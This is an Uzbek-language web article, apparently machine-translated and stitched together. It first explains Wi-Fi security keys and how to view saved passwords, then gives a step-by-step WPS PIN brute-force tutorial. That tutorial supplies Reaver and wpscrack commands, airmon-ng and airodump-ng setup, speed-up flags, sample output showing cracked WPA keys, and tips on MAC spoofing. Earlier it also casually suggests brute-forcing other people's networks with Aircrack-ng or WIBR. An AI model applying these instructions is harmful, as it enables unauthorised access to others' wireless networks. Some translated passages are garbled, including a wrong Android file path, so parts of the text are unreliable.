Simsiz xavfsizlik kalitini sozlash. Rostelekomdan Wi-Fi: xavfsizlik kalitini qanday kiritish kerak

Har kim biladiki, xavfsiz simsiz tarmoqlarga ulanishga urinishda "Tarmoq xavfsizligi kalitini kiriting" yozuvi tez-tez paydo bo'ladi. Ushbu kalit nima, nima uchun kerakligi, qanday ishlatilishi, qaerdan topilishi va turli xil usullar bilan qanday aniqlanishi haqida batafsil muhokama qilinadi. Aslida, har bir foydalanuvchi allaqachon nima ekanligini biladi, lekin, ehtimol, ishlarning haqiqiy holati haqida shunchaki bilmaydi. Darhaqiqat, quyida keltirilgan materialni o'qib chiqqandan so'ng, har qanday foydalanuvchida atamani o'zi va bunday kalitni aniqlash usullari bilan bog'liq bo'lgan savollar bo'lmaydi.

Umumiy tarmoq xavfsizligi kaliti nima?

Xo'sh, ushbu atama qanday tushuniladi? Agar kimdir bilmasa, simsiz tarmoqlarning xavfsizligi tarmoqqa ruxsatsiz kirishdan himoya qilish va uzatiladigan va qabul qilingan ma'lumotlarni shifrlash orqali ta'minlanadi.

Shu bilan birga, kalit tushunchasi hech qanday tarzda ishlatilgan shifrlash turiga bog'liq emas, balki aniq kirishni ta'minlashga tegishli. Ko'pchilik taxmin qilganidek, tarmoq xavfsizligi kaliti nima degan savolga yagona to'g'ri javob berilgan: bu yo'riqchidan so'ralganda kiritilgan eng keng tarqalgan kirish paroli. U har qanday lotin harflari, raqamlari va belgilaridan iborat bo'lishi mumkin.

U qanday ishlaydi?

Tarmoq xavfsizligi kaliti nima degan savolga, uning ishlashi bilan bog'liq ba'zi jihatlarni e'tiborsiz qoldirib bo'lmaydi. Haqiqat shundaki, so'rov simsiz tarmoqning o'zi emas, balki ishlatilgan yo'riqchidan (yo'riqnoma yoki ADSL modem) keladi.

Kompyuteringiz, noutbukingiz yoki mobil qurilmangiz tomonidan aniqlangan tarmoqqa ulanishga harakat qilsangiz, yo'riqnoma ustiga o'rnatilgan qurilmadan so'rov yuboriladi. O'z navbatida, bu simsiz tarmoqlarning xavfsizligini ta'minlaydi va sizga ulanish uchun bir xil taklifnoma beradi, lekin kirish parolini majburiy tasdiqlash bilan, bu ko'p hollarda, kalitni hisoblash imkonini beradigan dasturlardan tashqari, ruxsatsiz ulanishlardan himoya qiladi. Biz dasturlarga biroz keyinroq to'xtalamiz, ammo hozirda qanday qilib bunday tizimni va turli xil qurilmalarda bunday parolni bilib olishingiz mumkinligini ko'rib chiqamiz.

Windows-da tarmoq xavfsizligi kalitini qanday topish mumkin?

Avvalo, Wi-Fi-ga kirish uchun parollarini unutgan yoki yo'qotgan foydalanuvchilarga nisbatan Windows ish stoli operatsion tizimlarini ko'rib chiqamiz. Agar kompyuter yoki noutbuk tarmoqqa muammosiz ulansa, nima qilish kerak, lekin siz boshqa qurilmadan (masalan, mobil qurilmadan) kirishingiz kerak. Tarmoq xavfsizligi kalitini qayerdan olsam bo'ladi? Ushbu muammoni juda sodda tarzda hal qilish mumkin.

Avval siz "Tarmoq va almashish markazi" dan foydalangan holda o'rnatilgan ulanish xususiyatlariga o'tishingiz kerak. Siz uni ulanish belgisidagi RMB menyusi orqali qo'ng'iroq qilishingiz yoki "Boshqarish paneli" orqali tegishli bo'limga o'tishingiz mumkin. Xususiyatlar oynasida tarmoq nomi va parolni o'z ichiga olgan xavfsizlik yorlig'i ishlatiladi. Ammo u faqat nuqta sifatida ko'rsatiladi. Tarmoq himoyasi kalitini qanday topsam bo'ladi? Ha, faqat kiritilgan belgilar displeyi yonidagi katakchani belgilang, shunda parol sizning ko'zingiz oldida ko'rinadi.

Nima uchun bunday bo'ladi? Ha, faqatgina har qanday operatsion tizim, hatto bir martalik ulanish bilan ham, tarmoqlarning kiritilgan nomlarini va ularga parolni saqlab qo'yishi sababli, sukut bo'yicha ishlatiladigan ulanish haqida gapirmasa ham bo'ladi.

Routerda kalitni olish

Aslida, agar ushbu parametr foydalanuvchiga biron bir narsaga mos kelmasa, uni olish uchun yo'riqchining veb-interfeysidan foydalanib, uzoqroq yo'lni bosib o'tishingiz mumkin. Buni amalga oshirish uchun har qanday veb-brauzer orqali sozlamalarni kiritishingiz kerak, 192.168 dan boshlangan kombinatsiyalarni kiritishingiz kerak, undan keyin 0.1 yoki 1.1 qo'shiladi (standart bo'lmagan yo'riqnoma modellari uchun manzillar juda farq qilishi mumkin).

Shundan so'ng, simsiz ulanish (Simsiz) bo'limiga o'ting, so'ngra xavfsizlik (Xavfsizlik) bo'limida PSK deb belgilangan maydonni toping. Unda yozilgan narsa kerakli kalit. Agar biron sababga ko'ra yo'riqnoma sozlamalariga kira olmasangiz, ipconfig kombinatsiyasini buyruq satriga kiriting va standart shlyuz maydoniga qarang. Bu yo'riqchining o'zi manzili.

Android-da xavfsizlik kalitini topish

Tarmoq xavfsizligi kaliti nima ekanligini va uni Windows-da qanday topish mumkinligini aniqladik. Keling, Android mobil tizimlarida shunga o'xshash protseduralarni qanday bajarishni ko'rib chiqamiz. Bu erda hamma narsa biroz murakkabroq.

Agar parol odatdagi shaklda ulanish sozlamalarida ko'rsatilmasa, uni tizim fayllaridan izlashingiz kerak, lekin qurilmada ularga kirish uchun siz Ildiz huquqlariga va har qanday fayl menejeriga ega bo'lishingiz kerak. Menejerda ketma-ket Ma'lumotlar / Musiqa / WiFi kataloglaridan o'ting va ikkinchisida wpa_supplicant.conf nomi bilan matnli hujjatni oching va keyin kerakli tarmoq nomini matndan toping. Ismning yoniga tegishli kalit kiritiladi.

Ixtisoslashgan dasturlardan foydalanish

Mobil tizimlarda siz bepul WiFi Password Hacker dasturidan foydalanishingiz mumkin, u ishga tushirilgandan so'ng barcha ulanishlarni tekshiradi va kerakli tarmoqni tanlagandan so'ng, u uchun foydalaniladigan kirish parolini ekranda aks ettiradi.

Agar siz boshqa birovning tarmog'i uchun parolni topishingiz kerak bo'lsa, qo'pol kuch deb nomlangan biroz noqonuniy texnikadan foydalanishingiz kerak bo'ladi. Windows tizimlari uchun Aircrack-ng eng mos yordamchi dastur bo'lib, Android tizimlari uchun WIBR. Ulardan foydalanish juda oddiy, shuning uchun bunga e'tibor berishning ma'nosi yo'q. Ammo shuni yodda tutingki, ulardan foydalanish, agar noqonuniy bo'lmasa, hech bo'lmaganda odob-axloq chegaralaridan tashqarida.

Jami o'rniga

Xavfsizlik kaliti tushunchasi bilan bog'liq muammolarni hal qilishda hamma narsa shu. Kontseptsiyaning o'zi haqida faqat bitta xulosa qilish mumkin - bu eng keng tarqalgan kirish parolidir. Buni qanday tan olish kerakligi haqida o'ylaymanki, hech qanday maxsus savollar bo'lmasligi kerak, chunki bu har qanday operatsion tizimda juda sodda tarzda amalga oshiriladi. Tizim kataloglariga kirish huquqi bo'lmaganda, mobil qurilmalar bilan bog'liq muammolar bo'lishi mumkin, ammo tegishli huquqlarni olish uchun, masalan, avval kompyuterda o'rnatilgan Kingo Root kompyuter yordam dasturidan foydalanishingiz mumkin, so'ngra mobil qurilmaga o'z drayverini o'rnatasiz, shundan so'ng siz huquqlarga ega bo'lasiz. superuser.

Yaqinda WPA2 texnologiyasi bilan himoyalangan simsiz tarmoq juda xavfsiz bo'lib tuyuldi. Ulanish uchun oddiy kalitni topish haqiqatan ham mumkin. Agar siz haqiqatan ham uzoq kalitni o'rnatadigan bo'lsangiz, unda na kamalak stollari va na GPU tezlashishi sizga uni yig'ib olishga yordam bermaydi. Ammo, ma'lum bo'lishicha, simsiz tarmoqqa ulanmasdan - WPS protokolida yaqinda topilgan zaiflikdan foydalanish mumkin.

OGOHLANTIRISH

Barcha ma'lumotlar faqat ta'lim maqsadida taqdim etilgan. Birovning simsiz tarmog'iga kirish osonlikcha jinoiy javobgarlikka tortilishi mumkin. Boshingiz bilan o'ylab ko'ring.

Soddalashtirish narxi

Ulanish uchun umuman kalit kiritishingiz shart bo'lmagan ochiq kirish nuqtalari tobora kamayib bormoqda. Yaqinda ular Qizil kitobga kiritilishi mumkin. Agar ilgari odam o'zini simsiz tarmoqdan himoya qilib, simsiz tarmoqni kalit bilan yopib qo'yish mumkinligini bilmasa ham, endi unga bunday imkoniyat tobora kuchayib bormoqda. Masalan, sozlashni soddalashtirish uchun mashhur yo'riqnoma modellari uchun etakchi provayderlar chiqaradigan maxsus dasturiy ta'minotni oling. Siz ikkita narsani - login / parolni va ... simsiz tarmoqni himoya qilish kalitini ko'rsatishingiz kerak. Eng muhimi, OEMlarning o'zi sozlash jarayonini sodda saqlashga harakat qilishadi. Shunday qilib, aksariyat zamonaviy routerlar WPS (Wi-Fi Protected Setup) mexanizmini qo'llab-quvvatlaydi. Uning yordami bilan foydalanuvchi bir necha soniya ichida o'zini "umuman boshqa joyda shifrlashni yoqish va WPA kalitini ro'yxatdan o'tkazish kerakligi" bilan bezovta qilmasdan xavfsiz simsiz tarmoqni o'rnatishi mumkin. Tizimga yo'riqchida yozilgan sakkiz xonali ramziy PIN-kodni kiriting - va ishingiz tugadi! Va mana, mahkam ushlang. Dekabr oyida ikkita tadqiqotchi bir vaqtning o'zida WPS protokolidagi jiddiy tub bo'shliqlar haqida gaplashdilar. Bu har qanday yo'riqnoma uchun orqa eshikka o'xshaydi. Ma'lum bo'lishicha, agar kirish nuqtasida WPS yoqilgan bo'lsa (u bir necha daqiqada, ko'pgina yo'riqchilarda sukut bo'yicha yoqilgan bo'lsa), unda siz ulanish uchun PIN-kodni tanlashingiz va bir necha soat ichida ulanish uchun kalitni chiqarishingiz mumkin!

WPS qanday ishlaydi?

WPS yaratuvchilarining g'oyasi yaxshi. Mexanizm avtomatik ravishda tarmoq nomi va shifrlashni o'rnatadi. Shunday qilib, foydalanuvchi veb-interfeysga kirishi va murakkab sozlamalar bilan shug'ullanishi shart emas. Va siz allaqachon tuzilgan tarmoqqa istalgan qurilmani (masalan, noutbukni) osongina qo'shishingiz mumkin: agar siz PIN-kodni to'g'ri kiritgan bo'lsangiz, u barcha kerakli sozlamalarni oladi. Bu juda qulay, shuning uchun bozordagi barcha asosiy o'yinchilar (Cisco / Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) endi WPS qo'llab-quvvatlaydigan simsiz routerlarni taklif qilishadi. Keling, buni biroz ko'proq tushunaylik.

WPS-dan foydalanishning uchta varianti mavjud:

  1. Push-Button-Connect (PBC). Foydalanuvchi yo'riqnoma (qattiq) va kompyuterda (dasturiy ta'minot) maxsus tugmani bosadi va shu bilan sozlash jarayonini faollashtiradi. Bu bizni qiziqtirmaydi.
  2. Veb-interfeysga PIN-kodni kiritish. Foydalanuvchi yo'riqchining ma'muriy interfeysini brauzer orqali kiritadi va qurilmaning ishiga yozilgan sakkiz xonali PIN-kodni kiritadi (1-rasm), undan so'ng konfiguratsiya jarayoni amalga oshiriladi. Ushbu usul yo'riqchining dastlabki konfiguratsiyasi uchun ko'proq mos keladi, shuning uchun biz uni ham ko'rib chiqmaymiz.
  3. PIN-kodni foydalanuvchi kompyuteriga kiritish (2-rasm). Routerga ulanishda siz maxsus WPS sessiyasini ochishingiz mumkin, unda siz yo'riqchini sozlashingiz yoki PIN-kodni to'g'ri kiritgan bo'lsangiz, mavjud sozlamalarni olishingiz mumkin. Bu allaqachon jozibali. Bunday sessiyani ochish uchun autentifikatsiya talab qilinmaydi. Buni har kim qila oladi! Ma'lum bo'lishicha, PIN kod allaqachon shafqatsizlarcha hujumga duchor bo'lishi mumkin. Ammo bu shunchaki gullar.

Zaiflik

Avval aytib o'tganimdek, PIN-kod sakkizta raqamdan iborat - shuning uchun tanlash uchun 10 ^ 8 (100,000,000) variant mavjud. Biroq, variantlar sonini sezilarli darajada kamaytirish mumkin. Haqiqat shundaki, PIN-kodning oxirgi raqami dastlabki etti raqam asosida hisoblab chiqilgan nazorat summasining bir turi. Natijada biz allaqachon 10 ^ 7 (10,000,000) variantni olamiz. Ammo bu hammasi emas! Keyinchalik, WPS autentifikatsiya protokoli qurilmasini diqqat bilan ko'rib chiqing (3-rasm). Bu qo'pol kuch uchun joy qoldirish uchun maxsus ishlab chiqilgandek tuyuladi. Ma'lum bo'lishicha, PIN-kodni tekshirish ikki bosqichda amalga oshiriladi. U ikkita teng qismga bo'linadi va har bir qism alohida tekshiriladi! Diagrammani ko'rib chiqamiz:

  1. Agar M4 xabarini yuborganidan so'ng, tajovuzkor javob sifatida EAP-NACK olgan bo'lsa, u holda PIN-kodning birinchi qismi noto'g'ri ekanligiga amin bo'lishi mumkin.
  2. Agar u M6-ni yuborganidan keyin EAP-NACK olgan bo'lsa, unda PIN-kodning ikkinchi qismi noto'g'ri. Birinchi yarmi uchun 10 ^ 4 (10,000), ikkinchisi uchun 10 ^ 3 (1,000) variantlarini olamiz. Natijada bizda to'liq qidirish uchun atigi 11000 variant mavjud. Buning qanday ishlashini yaxshiroq tushunish uchun diagrammani ko'rib chiqing.
  3. Muhim nuqta - qidiruvning mumkin bo'lgan tezligi. Bu WPS so'rovlarini yo'riqnoma tomonidan qayta ishlash tezligi bilan cheklanadi: ba'zi kirish nuqtalari har soniyada, boshqalari - har o'n soniyada natijani beradi. Ko'p vaqt Diffie-Hellman algoritmi yordamida ochiq kalitni hisoblash uchun sarflanadi; u M3 bosqichidan oldin yaratilishi kerak. Bunga sarflanadigan vaqtni mijoz tomonidan oddiy maxfiy kalitni tanlash orqali qisqartirish mumkin, bu boshqa kalitlarni hisoblashni yanada soddalashtiradi. Amaliyot shuni ko'rsatadiki, muvaffaqiyatli natija uchun odatda barcha variantlarning faqat yarmini saralash kifoya qiladi va o'rtacha hisobda qo'pol kuch atigi to'rt-o'n soat davom etadi.

Birinchi dastur

Poytaxtda tadqiqotchi Stefan Fiebek tomonidan yozilgan wpscrack yordam dasturi (goo.gl/9wABj) paydo bo'ldi. Yordamchi dastur Scapy kutubxonasidan o'zboshimchalik bilan tarmoq paketlarini kiritish uchun foydalangan. Oldindan simsiz interfeysni kuzatuv rejimiga o'tkazgan holda, skriptni faqat Linux tizimida ishlatish mumkin. Parametrlar sifatida siz tizimdagi tarmoq interfeysi nomini, simsiz adapterning MAC-manzilini, shuningdek kirish nuqtasining MAC-manzilini va uning nomini (SSID) belgilashingiz kerak.

$ ./wpscrack.py --iface mon0 --client 94: 0c: 6d: 88: 00: 00 --bssid f4: ec: 38: cf: 00: 00 --ssid testap -v sniffer urinishni boshladi 00000000 urinish oldi 0.95 soniya 00010009-ni sinab ko'rmoqda<...> 18660005 urinish 1,08 soniyani bosib o'tdi 18670004 # topildi PIN-kodning birinchi yarmi 1,09 soniyani oldi 18670011 urinish 1,08 soniyani oldi<...> 18674095 # harakat qilib, PIN-kodning ikkinchi yarmini topdi<...> Tarmoq kaliti: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_passphras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Ko'rib turganingizdek, avval PIN-kodning birinchi yarmi, so'ngra ikkinchisi tanlandi va oxirida simsiz tarmoqqa ulanish uchun foydalanishga tayyor kalit chiqarildi. Oldindan mavjud bo'lgan vositalar yordamida ushbu uzunlikdagi kalitni (61 belgidan) topish uchun qancha vaqt ketishini tasavvur qilish qiyin. Biroq, wpscrack bu zaiflikdan foydalanadigan yagona yordamchi dastur emas va bu juda kulgili bir lahza: shu bilan birga, yana bir tadqiqotchi, Taktik Tarmoq Solutions-dan Kreyg Xefner xuddi shu muammo ustida ish olib borgan. Hujumni amalga oshirish uchun Internetda ishlaydigan PoC paydo bo'lganligini ko'rib, u o'zining Reaver yordam dasturini nashr etdi. U nafaqat WPS-PIN-kodni tanlash jarayonini avtomatlashtiradi va PSK tugmachasini ajratibgina qolmay, balki turli xil marshrutizatorlarga qarshi hujumni amalga oshirish uchun ko'proq sozlamalarni taklif qiladi. Bundan tashqari, u yana ko'plab simsiz adapterlarni qo'llab-quvvatlaydi. Biz buni asos qilib olishga qaror qildik va tajovuzkor xavfsiz simsiz tarmoqqa ulanish uchun WPS protokolidagi zaiflikdan qanday foydalanishi mumkinligini batafsil bayon qildik.

QANDAY

Boshqa har qanday simsiz hujumda bo'lgani kabi, bizga ham Linux kerak. Bu erda Reaver taniqli BackTrack tarqatish omborida mavjudligini aytishim kerak, bu simsiz qurilmalar uchun kerakli drayverlarni allaqachon o'z ichiga oladi. Shuning uchun biz undan foydalanamiz.

Qadam 0. Tizimni tayyorlash

BackTrack 5 R1 rasmiy veb-saytida VMware uchun virtual mashina va yuklanadigan ISO tasviri sifatida yuklab olish mumkin. Men oxirgi variantni tavsiya qilaman. Siz shunchaki tasvirni diskka yozishingiz mumkin yoki dasturni yuklash mumkin bo'lgan USB flesh-diskini yaratish uchun ishlatishingiz mumkin: u yoki bu tarzda, bunday ommaviy axborot vositasidan yuklanib, biz darhol keraksiz muammosiz ishlashga tayyor bo'lamiz.

Wi-Fi xakerlik ekspress kursi

  1. WEP (Simli Ekvivalent Maxfiylik) Simsiz tarmoqni himoya qilishning eng qadimgi texnologiyasi juda zaif ekanligi isbotlandi. Unda ishlatiladigan RC4 shifrining zaif tomonlaridan foydalanib, uni bir necha daqiqada tom ma'noda yorish mumkin. Bu erda asosiy vositalar paketlarni yig'ish uchun airodump-ng sniffer va to'g'ridan-to'g'ri kalitni yorish uchun ishlatiladigan aircrack-ng yordamchi dasturidir. Shuningdek, avtomatik rejimda WEP bilan barcha yaqin nuqtalarni buzadigan wesside-ng maxsus vositasi mavjud.
  2. WPA / WPA2 (Simsiz himoyalangan kirish)

Shafqatsiz kuch - bu yopiq WPA / WPA2 tarmog'i uchun kalitni topishning yagona usuli (va hatto u holda, mijoz kirish nuqtasiga ulanganda efirga uzatiladigan "WPA Handshake" deb nomlangan axlat mavjud bo'lsa ham).

Qo'pol kuch kunlar, oylar va yillarni talab qilishi mumkin. Sanab chiqish samaradorligini oshirish uchun avval ixtisoslashtirilgan lug'atlar ishlatilgan, so'ngra kamalak jadvallari yaratilgan, keyinchalik GPU yordamida jarayonni tezlashtirish uchun NVIDIA CUDA va ATI Stream texnologiyalaridan foydalanilgan kommunal xizmatlar paydo bo'ldi. Ushbu vositalar aircrack-ng (lug'atning qo'pol kuchi), kovotti (kamalak jadvallaridan foydalangan holda), pirit (videokartadan foydalangan holda).

Qadam 1. Kirish

Standart kirish va parol root: toor. Konsolga kirib, "X" ni xavfsiz boshlashingiz mumkin (BackTrack-ning alohida yig'ilishlari mavjud - GNOME bilan ham, KDE bilan ham):

# startx

Qadam 2. Reaver-ni o'rnatish

Reaver-ni yuklab olish uchun bizga internet kerak. Shuning uchun biz yamoq simini ulaymiz yoki simsiz adapterni sozlaymiz ("Ilovalar\u003e Internet\u003e Wicd Network Manager" menyusi). Keyinchalik, terminal emulyatorini ishga tushiramiz, u erda yordam dasturining so'nggi versiyasini ombor orqali yuklab olamiz:

# apt-get update # apt-get install reaver

Shuni aytishim kerakki, 1.3 versiyasi omborda, shaxsan men uchun to'g'ri ishlamadi. Muammo haqida ma'lumot qidirib topgach, men muallifning postini topdim, u SVN-dan olingan manbalarni to'plash orqali eng yuqori versiyaga yangilashni tavsiya qiladi. Bu, umuman olganda, eng ko'p qirrali o'rnatish usuli (har qanday tarqatish uchun).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

BackTrack ostida yig'ilish bilan bog'liq muammolar bo'lmaydi - shaxsan tekshiriladi. Men foydalanadigan Arch Linux tarqatishida tegishli PKGBUILD mavjudligi tufayli o'rnatish yanada osonlashadi:

$ yaourt -S reaver-wps-svn

Qadam 3. Qattiq kuch ishlatishga tayyorgarlik

Reaver-dan foydalanish uchun siz quyidagilarni bajarishingiz kerak:

  • simsiz adapterni kuzatuv rejimiga qo'ying;
  • simsiz interfeys nomini bilib oling;
  • kirish nuqtasining (BSSID) MAC manzilini bilib oling;
  • nuqtada WPS yoqilganligiga ishonch hosil qiling.

Birinchidan, simsiz interfeys odatda tizimda mavjudligini tekshirib ko'raylik:

# iwconfig

Agar ushbu buyruqning chiqishi tavsifga ega interfeysni o'z ichiga olsa (odatda wlan0), unda tizim adapterni taniydi (agar u Reaver-ni yuklash uchun simsiz tarmoqqa ulangan bo'lsa, unda ulanishni tugatish yaxshiroq). Adapterni kuzatuv rejimiga o'tkazamiz:

# airmon-ng start wlan0

Ushbu buyruq kuzatuv rejimida virtual interfeysni yaratadi, uning nomi buyruq chiqishida ko'rsatiladi (odatda mon0). Endi biz hujum uchun kirish nuqtasini topishimiz va uning BSSID-ni topishimiz kerak. Simsiz eshittirishlarni tinglash uchun airodump-ng yordam dasturidan foydalanamiz:

# airodump-ng mon0

Ekranda oraliqdagi kirish nuqtalarining ro'yxati paydo bo'ladi. Bizni WPA / WPA2 shifrlash va PSK kalitlari autentifikatsiyasi bilan ochkolar qiziqtiradi.

Ro'yxatdagi birinchilardan birini tanlash yaxshidir, chunki nuqta bilan yaxshi aloqa hujum uchun kerak. Agar fikrlar ko'p bo'lsa va ro'yxat ekranga to'g'ri kelmasa, unda siz boshqa taniqli yordamchi dastur - kismetdan foydalanishingiz mumkin, bu erda interfeys bu borada ko'proq moslangan. Ixtiyoriy ravishda, WPS mexanizmi yoqilganligini joyimizda tekshirishingiz mumkin. Buning uchun yuvish vositasi Reaver-ga qo'shilgan (lekin siz uni SVN-dan olgan bo'lsangiz):

# ./wash -i mon0

Parametr - bu monitoring rejimiga o'tkazilgan interfeysning nomi. Shuningdek, siz "-f" parametridan foydalanishingiz va yordam dasturini, masalan, xuddi shu airodump-ng tomonidan yaratilgan bosh faylni berishingiz mumkin. Ba'zi bir noma'lum sabablarga ko'ra, yuvish vositasi BackTrack-dagi Reaver paketiga kiritilmagan. Umid qilamanki, ushbu maqola chop etilgunga qadar ushbu xato bartaraf etildi.

Qadam 4. qo'pol kuchni ishga tushiring

Endi siz to'g'ridan-to'g'ri qo'pol majburiy PIN-kodga o'tishingiz mumkin. Eng oddiy holatda, Reaver-ni boshlash uchun sizga ozgina kerak. Siz faqat interfeys nomini (ilgari biz monitoring rejimiga o'tkazganmiz) va kirish nuqtasining BSSID-ni ko'rsatishingiz kerak.

# reaver -i mon0 -b 00: 21: 29: 74: 67: 50 -vv

"-Vv" tugmasi dasturning kengaytirilgan chiqishini ta'minlaydi, shunda hammasi kutilganidek ishlashiga ishonch hosil qilishimiz mumkin.

Reaver v1.4 WiFi Protected Setup hujumi vositasi Mualliflik huquqi (c) 2011 yil, Taktik tarmoq echimlari, Kreyg Xefner [+] 00: 21: 29: 74: 67: 50 dan mayoqni kutish [+] 00: 21: 29: 74: 67: 50 bilan bog'liq (ESSID: linksys) [+] Sinov pimi 63979978

Agar dastur doimiy ravishda PIN-kodlarni kirish nuqtasiga yuboradigan bo'lsa, demak, hamma narsa yaxshi boshlangan va kutish ahmoq bo'lib qoladi. Jarayonni kechiktirish mumkin. PIN-kodni yig'ish uchun eng qisqa vaqt besh soatni tashkil etdi. Tanlangan zahoti dastur sizga bu haqda quvonch bilan xabar beradi:

[+] Sinov pin 64637129 [+] 13654 soniyada kalit yorilib ketdi [+] WPS PIN-kod: "64637129" [+] WPA PSK: "MyH0rseThink $ YouStol3HisCarrot!" [+] AP SSID: "linksys"

Bu erda eng qimmat narsa, albatta, darhol ulanish uchun foydalanishingiz mumkin bo'lgan WPA-PSK tugmasi. Hammasi shu qadar oddiyki, u xattoki mening xayolimga ham sig'maydi.


O'zingizni himoya qila olasizmi?

Hali ham o'zingizni hujumdan himoya qilishingiz mumkin - yo'riqnoma sozlamalarida WPS nafig-ni o'chirib qo'ying. To'g'ri, ma'lum bo'lishicha, bu har doim ham mumkin emas. Zaiflik dastur darajasida emas, balki protokol darajasida mavjud bo'lganligi sababli, ishlab chiqaruvchilardan barcha muammolarni hal qiladigan erta tuzatishni kutishga arzimaydi. Endi ular qila oladigan eng ko'p narsa - qo'pol kuchga imkon qadar ko'proq qarshi turish. Masalan, agar siz PIN-kodni kiritish uchun beshta muvaffaqiyatsiz urinishdan so'ng, WPS-ni bir soat davomida to'sib qo'ysangiz, shafqatsizlarcha hujum 90 kun davom etadi. Ammo yana bir savol shundaki, butun dunyo bo'ylab ishlaydigan millionlab qurilmalarga bunday yamoqni qanchalik tez tarqatish mumkin?

Nasosli reaver

HOWTO-da biz Reaver yordam dasturidan foydalanishning eng sodda va ko'p qirrali usulini ko'rsatdik. Biroq, WPS dasturining ishlab chiqarilishi ishlab chiqaruvchida farq qiladi, shuning uchun ba'zi hollarda qo'shimcha konfiguratsiya talab qilinadi. Quyida men kalitlarni takrorlash tezligi va samaradorligini oshiradigan qo'shimcha variantlarni taqdim etaman.

  1. Siz kirish raqamining kanal raqamini va SSID-ni o'rnatishingiz mumkin: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -c 11 -e linksys
  2. "-Dh-small" opsiyasi qo'pol kuch tezligiga ijobiy ta'sir qiladi, bu maxfiy kalitning kichik qiymatini belgilaydi va shu bilan kirish nuqtasi tomonida hisob-kitoblarni osonlashtiradi: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -vv - -dh-kichik
  3. Odatiy javob vaqti - besh soniya. Agar kerak bo'lsa, uni o'zgartirish mumkin: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -t 2
  4. Sinovlar orasidagi standart kechikish bir soniya. U shuningdek tuzilishi mumkin: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 -d 0
  5. Ba'zi kirish punktlari WPS-ni ma'lum vaqtga to'sib qo'yishi mumkin, chunki ular bechora bo'lishga harakat qilmoqdalar. Reaver bu holatni sezadi va qidiruvni sukut bo'yicha 315 soniya davomida to'xtatib turadi, ushbu pauzaning davomiyligini o'zgartirish mumkin: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --lock-delay \u003d 250
  6. WPS protokolining ba'zi bir ilovalari, agar PIN kod noto'g'ri bo'lsa, ulanishni to'xtatadi, ammo spetsifikatsiya bo'yicha ular maxsus xabarni qaytarishlari kerak. Reaver bunday holatni avtomatik ravishda tan oladi, buning uchun '-nack': # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --nack
  7. "- tugatish-tugatish" opsiyasi EAP FAIL xabaridan foydalangan holda WPS sessiyasini tugatishni talab qiladigan AP bilan ishlash uchun mo'ljallangan: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --eap-terminate
  8. WPS sessiyasida xatolarning paydo bo'lishi APning PIN-kodni kiritishga urinishlar sonini cheklashi yoki shunchaki ortiqcha so'rovlar bilan to'ldirilishini anglatishi mumkin. Bu haqda ma'lumot ekranda ko'rsatiladi. Bunday holda, Reaver o'z faoliyatini to'xtatadi va pauza vaqtini '—fail-wait' opsiyasi bilan belgilash mumkin: # reaver -i mon0 -b 00: 01: 02: 03: 04: 05 --fail-wait \u003d 360

Tss

Savol: Jailbreak uchun qanday simsiz adapter kerak?

Javob: Tajriba qilishdan oldin simsiz adapterning monitoring rejimida ishlashiga ishonch hosil qilishingiz kerak. Eng yaxshi usul - Aircrack-ng loyihasi saytidagi qo'llab-quvvatlanadigan apparatlarning ro'yxatini tekshirish. Agar qaysi simsiz modulni sotib olish kerakligi haqida savol tug'ilsa, siz RTL8187L chipsetiga asoslangan har qanday adapterdan boshlashingiz mumkin. USB dongllarni Internetda 20 dollarga topish oson.

Savol: Nega men "vaqt tugashi" va "ishlamay" xatolarga yo'l qo'yayapman?

Javob: Bu odatda signal kuchi pastligi va kirish nuqtasi bilan yomon aloqa tufayli sodir bo'ladi. Bundan tashqari, kirish nuqtasi WPS-dan foydalanishni vaqtincha to'sib qo'yishi mumkin.

Savol: Nima uchun mening MAC manzilimdagi soxtalashtirish ishlamayapti?

Javob: Ehtimol, siz mon0 virtual interfeysining MAC-ni buzasiz va bu ishlamaydi. Haqiqiy interfeysning nomini ko'rsatishingiz kerak, masalan, wlan0.

Savol: Nega Reaver yomon signal bilan yomon ishlaydi, garchi xuddi shu WEP yorilishi yaxshi bo'lsa?

Javob: Odatda WEP yorilishi muvaffaqiyatli yorilish uchun zarur bo'lgan ko'proq boshlang'ich vektorlarini (IV) olish uchun ushlangan paketlarni qayta yo'naltirish orqali sodir bo'ladi. Bunday holda, biron bir paket yo'qolishi yoki yo'lda qandaydir tarzda buzilganligi muhim emas. Ammo WPS-ga hujum qilish uchun har bir PIN-kodni tekshirish uchun kirish nuqtasi va Reaver o'rtasida paketlarni uzatish protokoliga qat'iy rioya qilish kerak. Va agar bir vaqtning o'zida biron bir paket yo'qolsa yoki nomaqbul shaklda bo'lsa, unda siz WPS sessiyasini qayta tiklashingiz kerak bo'ladi. Bu WPS-ga hujumlarni signal kuchiga ko'proq bog'liq qiladi. Shuni ham yodda tutish kerakki, agar sizning simsiz adapteringiz kirish nuqtasini ko'rsa, bu kirish nuqtasi sizni ham ko'rishini anglatmaydi. Shunday qilib, agar siz ALFA Network-ning yuqori quvvatli adapteri va bir necha o'n dBi uchun antennaning faxrli egasi bo'lsangiz, unda barcha ushlangan kirish nuqtalarini sindira olaman deb umid qilmang.

Savol: Reaver kirish nuqtasiga doimo bir xil PIN-kodni yuboradi, nima bo'ldi?

Javob: Routerda WPS yoqilganligini tekshiring. Buni yuvish vositasi yordamida qilishingiz mumkin: uni ishga tushiring va maqsadingiz ro'yxatda ekanligiga ishonch hosil qiling.

Savol: Nima uchun kirish nuqtasi bilan bog'lana olmayman?

Javob: Buning sababi signal kuchining pastligi yoki sizning adapteringiz bunday tadqiqotlar uchun mos emasligi bo'lishi mumkin.

